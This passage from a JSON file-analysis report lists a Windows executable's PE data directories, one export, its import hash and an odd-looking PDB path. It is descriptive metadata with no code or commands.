  2155. "virtual_address": "0x0002e630",
  2156. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  2157. "size": "0x0000004d"
  2158. },
  2159. {
  2160. "virtual_address": "0x0002e680",
  2161. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  2162. "size": "0x00000028"
  2163. },
  2164. {
  2165. "virtual_address": "0x04e99000",
  2166. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  2167. "size": "0x00002148"
  2168. },
  2169. {
  2170. "virtual_address": "0x00000000",
  2171. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  2172. "size": "0x00000000"
  2173. },
  2174. {
  2175. "virtual_address": "0x00000000",
  2176. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  2177. "size": "0x00000000"
  2178. },
  2179. {
  2180. "virtual_address": "0x04e9c000",
  2181. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  2182. "size": "0x00001fcc"
  2183. },
  2184. {
  2185. "virtual_address": "0x000261d0",
  2186. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  2187. "size": "0x00000038"
  2188. },
  2189. {
  2190. "virtual_address": "0x00000000",
  2191. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  2192. "size": "0x00000000"
  2193. },
  2194. {
  2195. "virtual_address": "0x00000000",
  2196. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  2197. "size": "0x00000000"
  2198. },
  2199. {
  2200. "virtual_address": "0x00000000",
  2201. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  2202. "size": "0x00000000"
  2203. },
  2204. {
  2205. "virtual_address": "0x00000000",
  2206. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  2207. "size": "0x00000000"
  2208. },
  2209. {
  2210. "virtual_address": "0x00000000",
  2211. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  2212. "size": "0x00000000"
  2213. },
  2214. {
  2215. "virtual_address": "0x00026000",
  2216. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  2217. "size": "0x00000174"
  2218. },
  2219. {
  2220. "virtual_address": "0x00000000",
  2221. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  2222. "size": "0x00000000"
  2223. },
  2224. {
  2225. "virtual_address": "0x00000000",
  2226. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  2227. "size": "0x00000000"
  2228. },
  2229. {
  2230. "virtual_address": "0x00000000",
  2231. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  2232. "size": "0x00000000"
  2233. }
  2234. ],
  2235. "exports": [
  2236. {
  2237. "ordinal": 1,
  2238. "name": "MyFunc165@@4",
  2239. "address": "0x425db0"
  2240. }
  2241. ],
  2242. "guest_signers": {},
  2243. "imphash": "e4ef01da1d05a7641f1f800f164dcec2",
  2244. "icon_fuzzy": null,
  2245. "icon": null,
  2246. "pdbpath": "C:\\xaserohakapebeh-jeron74_nonokacideyebiwac71_s.pdb\\x00\\bin\\hozatejiz.pdb\\x00\\x00\\x00\\x00\\x00\\x9d\\x00\\x00\\x00\\x9d",
  2247. "imported_dll_count": 1,
  2248. "versioninfo": []
  2249. }
  2250. }